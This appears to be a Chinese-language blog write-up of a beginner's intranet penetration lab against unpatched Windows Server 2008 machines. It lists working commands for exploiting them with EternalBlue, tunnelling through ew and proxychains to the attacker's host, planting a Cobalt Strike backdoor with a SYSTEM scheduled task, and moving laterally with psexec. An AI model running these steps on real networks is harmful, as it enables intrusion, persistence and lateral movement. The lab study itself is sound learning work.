我的第一次內(nèi)網(wǎng)滲透
網(wǎng)絡(luò)拓?fù)?/p>
因為是一次簡單的內(nèi)網(wǎng)滲透,以上靶機(jī)均為Windows Server2008,并且沒有裝任何的補(bǔ)丁,所以全都可以使用ms17_010(永恒之藍(lán))進(jìn)行攻擊
首先直接使用msf拿到了內(nèi)網(wǎng)跳板(10.7.233.212)的shell,并且為最高權(quán)限,
然后對它進(jìn)行信息收集,首先查看IP,查看內(nèi)網(wǎng)的網(wǎng)段是多少 輸入命令ipconfig進(jìn)行查看,然后得知內(nèi)網(wǎng)跳板的內(nèi)網(wǎng)IP為(192.168.174.128),
然后為了方便操作,直接在meterpreter界面中輸入命令run getgui -e一鍵開啟靶機(jī)的3389端口
,然后再輸入arp -g和route print對靶機(jī)進(jìn)行信息收集,得到了靶機(jī)內(nèi)網(wǎng)的另一臺機(jī)子的IP地址為(192.168.174.129) 連接(192.168.174.128:3389);
CS生成了一個后綴為exe的后門,想用python -m http.server將后門通過瀏覽器的方式傳輸?shù)桨袡C(jī)中,但是發(fā)現(xiàn)靶機(jī)并不能訪問到web服務(wù)器.只能通過msf創(chuàng)建的shell來上傳.
將后門成功上傳到靶機(jī)中,運(yùn)行,CS上線了靶機(jī)
然后進(jìn)行對內(nèi)網(wǎng)中的靶機(jī)進(jìn)行滲透測試;首先想要想要進(jìn)一步對內(nèi)網(wǎng)進(jìn)行滲透,那么就要配置代理服務(wù),使得kali能夠成功進(jìn)入內(nèi)網(wǎng);
首先想到先用的代理方式是msf本身的代理方式,通過在跳板機(jī)中加入一條路由,然后切換到auxiliary/server/socks_proxy模塊開啟代理服務(wù);
首先進(jìn)入msf中內(nèi)網(wǎng)跳板機(jī)(10.7.233.212&192.168.174.128)的meterpreter界面輸入命令run post/multi/manage/autoroute自動添加一條路由,然后將會話放入后臺
,開啟socks的代理服務(wù)(配置SRVHOST,SRVPORT,VERSION),然后配置/etc/proxychains4.conf文件,在文件的最后一行添加->sock5 127.0.0.1 1234,
然后調(diào)用proxychains來執(zhí)行命令,但是一開始一直是用proxychains ping去測試代理是否成功,但是后來才發(fā)現(xiàn),ping命令根本就不能夠使用
sock4a:TELNET,FTP,HTTP等TCP協(xié)議;
sock5:TCP與UDP,并支持安全認(rèn)證方案;
這兩種協(xié)議均不支持ping,因為ping是icmp; 因為一開始沒發(fā)現(xiàn),以為是代理沒有成功,后面就換了ew來進(jìn)行內(nèi)網(wǎng)滲透,將Windows版本的ew上傳至靶機(jī),
切換到本機(jī)(攻擊機(jī)->kali)輸出命令ew -s rcsocks -l 1080 -e 8888將本地1080端口受到的代理轉(zhuǎn)發(fā)至8888端口,然后切換到靶機(jī)上輸入命令ew -s rssocks -d 10.7.33.234 -e 8888,
當(dāng)本機(jī)ew界面彈出
回顯即為代理成功,因為可以使用ms17_010一路通關(guān),就直接用代理開啟msf然后繼續(xù)對129進(jìn)行滲透測試
使用命令proxychains msfconsole開啟msf,是使用了sock5代理的,當(dāng)然也可以在cs中直接設(shè)置代理,然后在msf中直接設(shè)置全局變量使用代理,
然后繼續(xù)進(jìn)行下一步的滲透測試,繼續(xù)使用ms17_010模塊,去對下一臺靶機(jī)進(jìn)行滲透測試,但是發(fā)現(xiàn)怎么樣都沒有將shell彈出來,以為是msf中shell傳不出來,于是改用CS,生成后門,然后上傳另一臺靶機(jī),
使用計劃執(zhí)行的命令來觸發(fā)木馬,先將生成好的木馬上傳至已經(jīng)獲得shell的跳板機(jī),然后使用命令
copy C:\shell.exe \192.16.174.129\C$將名為shell.exe的后門上傳至內(nèi)網(wǎng)跳板二上,然后再使用命令
schtasks /create /s 192.168.174.129 /u Administrator /p P@ssw0rd! /ru “SYSTEM” /tn test /sc DALIY /st 14:10 /tr C:\windows\temp\shell.exe創(chuàng)建一個名為test的計劃任務(wù),在每天的14:10執(zhí)行shell.exe文件,但是CS并沒有相應(yīng)機(jī)器上線 后來才察覺到,這個是不出網(wǎng)機(jī)器的滲透;于是改變策略,在CS上創(chuàng)建一個監(jiān)聽器,使用的payload是Beacon SMB,然后再CS中使用psexec進(jìn)行橫向移動,選擇剛才創(chuàng)建的payload為Beacon SMB的監(jiān)聽器,選擇10.7.233.212的會話,然后開始橫向移動,然后就會得到一個IP地址為192.168.174.128的會話->
然后用這個會話生成一個監(jiān)聽器,選中中轉(zhuǎn)模塊的listenr,生成一個監(jiān)聽器,然后用監(jiān)聽器生成一個后門上傳并允許就有一個新的會話。